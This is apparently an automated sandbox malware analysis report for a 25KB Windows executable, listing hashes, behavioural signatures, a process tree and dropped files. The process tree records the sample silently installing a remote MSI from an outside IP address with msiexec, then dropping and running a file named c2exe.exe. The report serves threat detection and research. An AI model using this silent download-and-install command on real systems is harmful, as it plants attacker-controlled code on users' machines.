Analysis

  • max time kernel: 153s
  • max time network: 161s
  • platform: windows10-2004_x64
  • resource: win10v2004-20240226-en
  • resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
  • submitted: 30-05-2024 01:29

General

  • Target: b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881.exe
  • Size: 25KB
  • MD5: 0446fd1ab00e877ee83132179991399f
  • SHA1: b5aa6b4e37a9ae8737968940566db92ce10f15d2
  • SHA256: b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881
  • SHA512: f6a5aaa24535f519fe5f620d332bcfa963d246f31ab02420db5e5a8e46bcd255d4d9e57416c2f703061145e4199ef8f52e0867423a3adc581dc0cb4abf5b4865
  • SSDEEP: 768:QEHP8+0Vfgno6zSKXqyfM41v1lbVxfgm3HrdA:QEHP8+01gVRzfX3y

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE (1 IoCs)
  • Loads dropped DLL (1 IoCs)
  • Modifies file permissions (1 TTPs, 1 IoCs)
  • Use of msiexec (install) with remote resource (1 IoCs)
  • Blocklisted process makes network request (1 IoCs)
  • Enumerates connected drives (3 TTPs, 23 IoCs)
    Attempts to read the root path of hard drives other than the default C: drive.
  • Drops file in Windows directory (7 IoCs)
  • Suspicious behavior: EnumeratesProcesses (4 IoCs)
  • Suspicious use of AdjustPrivilegeToken (37 IoCs)
  • Suspicious use of WriteProcessMemory (13 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881.exe
    "C:\Users\Admin\AppData\Local\Temp\b4661adcd4f1a037346037efa829293b00d976c56bccc683c423e3a93a8da881.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4284
    • C:\Windows\system32\msiexec.exe
      "C:\Windows\system32\msiexec.exe" /quiet /i http://3.141.55.131:8000/c2exe.msi
      2⤵
      • Use of msiexec (install) with remote resource
      • Suspicious use of AdjustPrivilegeToken
      PID:2348
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Enumerates connected drives
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3052
    • C:\Windows\syswow64\MsiExec.exe
      C:\Windows\syswow64\MsiExec.exe -Embedding 876DF1CB9605DF26E73B011D58787A9D
      2⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:892
      • C:\Windows\SysWOW64\ICACLS.EXE
        "C:\Windows\system32\ICACLS.EXE" "C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        3⤵
        • Modifies file permissions
        PID:4312
      • C:\Windows\SysWOW64\EXPAND.EXE
        "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        3⤵
        • Drops file in Windows directory
        PID:4936
      • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files\c2exe.exe
        "C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files\c2exe.exe"
        3⤵
        • Executes dropped EXE
        PID:2260
  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4068 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8
    1⤵
    PID:4740

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files.cab
    Filesize: 6KB
    MD5: f48a85de44fbab2c246fae7ac3c2e079
    SHA1: 6ae186f30e2d1ffbda51daf5385dd5323daaf8b0
    SHA256: 433894591dde3ef00e6b59f13c5106574d2920c5bde0c82567331305b2607127
    SHA512: 4adf930db3f3eeb81132a0223c80bd7c066c279258aeeed88e300d38b3e8cdf1db9d643c9a60ae164a4b6e1892e6a389b0efcd3cccbb2c93b9bf0d061207dee3

  • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\files\c2exe.exe
    Filesize: 6KB
    MD5: 2f4531484ff7ac43f50304a421d52d8a
    SHA1: 237404f24027658f4b7c4b59f4b6342b7694d141
    SHA256: 1ef99f635530b86c85c4d3a3e2bd382e9ca61ac6b23ef1bfaf141933107aad89
    SHA512: 967b93e18ef39d2138d8123e110bbb61114fbf7238eff53d9888c527dbdddd1e643224942dfd29d9a8448ffb857f5c4a2319118d05dcdbb656d1556968c930d1

  • C:\Users\Admin\AppData\Local\Temp\MW-0a07efff-15d1-4236-ade3-0dc011d1d366\msiwrapper.ini
    Filesize: 1KB
    MD5: 9c667dc0794c87808bc48e83028f4ea8
    SHA1: e192e548925de4adb328468e4382daeb0a05b98f
    SHA256: 9184897d059bd20b9060d771251de7023ac0224f294af3bbd4908e50923c24c8
    SHA512: a47080605340831e88cbe0ce7deb259d6e880991b32c42986416a70033dd416f5a6a52decddc2c6b909a2ae6f0dce21c8dbb73d280b6725d51b1293af032726b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tivtqjye.aj1.ps1
    Filesize: 60B
    MD5: d17fe0a3f47be24a6453e9ef58c94641
    SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Windows\Installer\MSI3B8D.tmp
    Filesize: 252KB
    MD5: d457ede045732a5c1e1895304d1dc560
    SHA1: 658c7ccbb5164044da088f5c3e447de059571e20
    SHA256: 2cf84ed623f2680e8162d7499b9bdab785dad88bfb6fc012717f53c8dfae3dde
    SHA512: 6da954934dcbabda052ffe6324880145e8e5334a077d1be0e865f6679e0abd6e207712d37f1f6ce6b79073d18dacaa60d56cc5bf534fe8f66138a29e8fba2f4c

  • C:\Windows\Installer\MSI585D.tmp
    Filesize: 208KB
    MD5: 0c8921bbcc37c6efd34faf44cf3b0cb5
    SHA1: dcfa71246157edcd09eecaf9d4c5e360b24b3e49
    SHA256: fd622cf73ea951a6de631063aba856487d77745dd1500adca61902b8dde56fe1
    SHA512: ed55443e20d40cca90596f0a0542fa5ab83fe0270399adfaafd172987fb813dfd44ec0da0a58c096af3641003f830341fe259ad5bce9823f238ae63b7e11e108

  • memory/2260-86-0x0000000000A60000-0x0000000000A68000-memory.dmp
    Filesize: 32KB

  • memory/4284-13-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp
    Filesize: 10.8MB

  • memory/4284-24-0x00007FFFD6DE3000-0x00007FFFD6DE5000-memory.dmp
    Filesize: 8KB

  • memory/4284-25-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp
    Filesize: 10.8MB

  • memory/4284-0-0x00007FFFD6DE3000-0x00007FFFD6DE5000-memory.dmp
    Filesize: 8KB

  • memory/4284-12-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp
    Filesize: 10.8MB

  • memory/4284-76-0x00007FFFD6DE0000-0x00007FFFD78A1000-memory.dmp
    Filesize: 10.8MB

  • memory/4284-11-0x000000001BBA0000-0x000000001BBC2000-memory.dmp
    Filesize: 136KB

  • memory/4284-1-0x0000000000F50000-0x0000000000F5C000-memory.dmp
    Filesize: 48KB